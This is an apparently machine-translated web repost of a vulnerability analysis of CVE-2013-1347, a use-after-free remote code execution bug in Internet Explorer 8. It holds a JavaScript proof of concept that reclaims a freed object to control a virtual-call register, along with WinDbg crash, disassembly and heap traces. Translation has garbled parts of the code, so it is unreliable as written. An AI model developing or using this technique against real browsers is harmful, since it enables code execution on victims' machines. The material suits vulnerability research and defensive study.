Home > Developer > Web Develop

Cve-2013-1347microsoft Internet Explorer 8 Remote Code Execution vulnerability

Source: Internet
Author: User
Tags cve
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

[CNNVD] Microsoft Internet Explorer 8 Remote Code Execution vulnerability (cnnvd-201305-092)

Microsoft Internet Explorer is the default bundled Web browser in a Windows operating system that is published by Microsoft Corporation (Microsoft) in the United States.
A remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been properly initialized or has been deleted, which could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker could have a specially crafted Web site designed to exploit this vulnerability through IE and then persuade a user to view the site.

Poc:

<!doctype html>functionHelloWorld () {animvalues= ""; //mshtml! CElement::D OC:    //6586c815 8B01 mov eax,dword ptr [ecx]    //6586c817 8b5070 mov edx,dword ptr [eax+70h]    //6586c81a ffd2 call edx     for(i=0; I <= 0X70/4; i++) {//T:animatecolor Label the first object to overwrite the virtual table pointer        //since the index virtual function requires an offset 0x70, the 0X70/4 is used to precisely control the edx value .        if(i = = 0X70/4) {//animvalues + = unescape ("%u5ed5%u77c1"); Animvalues + = unescape ("%u4141%u4141");//Control edx=0x41414141        }        Else{animvalues+ = unescape ("%u4242%u4242");//0x42424242        }        }     for(i = 0; i < i++;) {        //T:animatecolor Tag Value is a semicolon-delimited string, the number of semicolons determines the size of the object,        //each element of the object is a pointer to a semicolon-delimited string        //The vulnerability object cgnericelement size 0x4c, so you need a string with 0x4c/4=13 semicolons hereAnimvalues + = "; Red"; } F0= Document.createelement (' span ');    Document.body.appendChild (F0); F1= Document.createelement (' span ');    Document.body.appendChild (F1); F2= Document.createelement (' span ');    Document.body.appendChild (F2); Document.body.contentEditable= "true"; F2.appendchild (Document.createelement (' DataList ')); F1.appendchild (Document.createelement (' Span ')); F1.appendchild (Document.createelement (' Table ')); Try{f0.offsetparent=NULL; }Catch(e) {} f2.innerhtml=""; F0.appendchild (Document.createelement (' HR ')); F1.innerhtml="";    CollectGarbage (); Try {        //use T:animatecolor tags to freely set their contents, control object SizeA = document.getElementById (' Myanim '); A.values=animvalues; }    Catch(e) {}}</script>
The crash caused by opening the POC is as follows, and the page heap and heap allocation records are turned on.
(4dc.8f0): Access violation-code c0000005 (first chance) first chance exceptions is reported before any exception ha Ndling. This exception is expected andhandled.eax=66c25100 ebx=17a72fb0 ecx=09106fc8edx=00000000Esi=045fedc8Edi=00000000eip=668ac400 esp=045fed9cebp=045FEDB4Iopl=0nv up ei pl zr na pe nccs=001bss=0023ds=0023es=0023fs=003bgs=0000Efl=00010246mshtml!CElement::Doc:668ac400 8b01movEax,dword ptr [ecx]ds:0023:09106fc8=????????
Take a look at the nearby assembly, as shown below. is very obvious object access, see the first three sentences to know is to go to the object virtual table, and then the index virtual function to call. Crash appears in ECX
1:017> U 668ac400mshtml!CElement::Doc:668ac400 8b01movEax,dword ptr [ecx]668ac402 8b5070movEdx,dword ptr [eax+70h]668ac405 ffd2Pageredx668ac407 8b400cmovEax,dword ptr [eax+0ch]668ac40a c3ret668ac40b 33c0XOReax,eax668ac40d e9f7aeffffjmpmshtml!Cattrarray::P rivatefind+0x8f (668a7309) 668ac412 -              NOP
We look at the ECX, as shown below, ECX is not available. So I just need to focus on what ECX is and what it's all about.
1:017> DC ecx09106fc8  ???????? ???????? ???????? ???????? ????????????????09106fd8  ???????? ???????? ???????? ???????? ????????????????09106fe8  ???????? ???????? ???????? ???????? ????????????????09106ff8  ???????? ???????? ???????? ???????? ????????????????09107008  ???????? ???????? ???????? ???????? ????????????????09107018  ???????? ???????? ???????? ???????? ????????????????09107028  ???????? ???????? ???????? ???????? ????????????????09107038???????? ???????? ????????  ???????? ????????????????
See if the ecx is a heap, as shown below, and sure enough it belongs to the heap, and according to the heap allocation backtracking This is the heap that has been freed, the obvious UAF loophole. We specifically look at what this object,ceventobj:: ' vector deleting destructor'  seems to be a problem with the ceventobj object
1:017>!heap-p-a ECX address09106fc8Foundinch_dph_heap_root @51000    inchFree-ed Allocation (Dph_heap_block:virtaddr virtsize) 7093c98:9106000              -737e90b2 verifier! AVRFDEBUGPAGEHEAPFREE+0X000000C277955674ntdll! rtldebugfreeheap+0x0000002f 77917aca ntdll! rtlpfreeheap+0x0000005d 778e2d68 ntdll! rtlfreeheap+0x00000142 76fff1ac kernel32! heapfree+0x00000014 668B7DFC mshtml!Ceventobj:: ' Vector deleting destructor'+0x00000022 668b7dd0 mshtml! cbase::subrelease+0x00000022 668ab034 mshtml! plainrelease+0x00000025 69e398ea mstime! CEVENTMGR::_FIREEVENT+0X000001C0 69dfd9db mstime! CTIMEELEMENTBASE::FIREEVENTS+0X000000CE 69dfb7c9 mstime! ctimeelementbase::fireevent+0x0000016e 69e00521 mstime! MMBASEBVR::TEBVR::EVENTNOTIFY+0X000000AC 69e49379 mstime! Eventdispatcher::D oit+0x0000001c 69e492bb mstime! dispatch+0x00000083 69e493b7 mstime! Cnodebvrlist::D ispatcheventnotify+0x00000035 69e46f95 mstime! ceventdata::callevent+0x00000021 69e442a6 mstime! Ctimenodemgr::tick+0x000000ec 69e00b05 mstime! mmplayer::tick+0x0000004a 69e00b62 mstime! mmplayer::ontimer+0x00000036 69df720e mstime! CTIMEBODYELEMENT::STARTROOTTIME+0X000000A2 69df6ee4 mstime! ctimebodyelement::onload+0x0000002f 69dfd528 mstime! ctimeelementbase::onloadevent+0x0000001e 69e39e54 mstime! ceventmgr::invoke+0x00000230 6690be60 mshtml! cbase::invokeevent+0x00000512 668ff3f1 mshtml! comwindowproxy::fireevent+0x00000169 66896a12 mshtml! Comwindowproxy::fire_onload+0x000000d5 66896dde mshtml! cmarkup::onloadstatusdone+0x0000040a 66896AAF mshtml! cmarkup::onloadstatus+0x00000047 66896fad mshtml! Cprogsink::D oupdate+0x00000549 66824fab mshtml! cprogsink::onmethodcall+0x00000012 668c94b2 mshtml! GLOBALWNDONMETHODCALL+0X000000FF 668b37f7 mshtml! Globalwndproc+0x0000010c
 To verify our guesses, let's look at how the UAF object is distributed. Let's start by breaking down the destructor for this object, as follows. 
 1 : 017  > x mshtml!ceventobj: : ' vector deleting Destructor '  668b7dda mshtml! Ceventobj:: ' vector deleting destructor   '   = <no type Information>  1 :  1 : 017  > bl  0  e 668b7dda 0001  (0001 ) 1 :* * * * mshtml! ceventobj: : ' scalar deleting destructor
Reload the process and don't forget to set the. childdbg 1. Each run must be reset feel good annoying, do not know how to set save.
Cve-2013-1347microsoft Internet Explorer 8 Remote Code Execution vulnerability

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
php remote code execution internet explorer 8 for mac internet explorer 8 1 download internet explorer stopped working windows 8 1 clear cache and cookies internet explorer 8 internet explorer 8 cannot display webpage internet explorer not responding windows 8 1

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More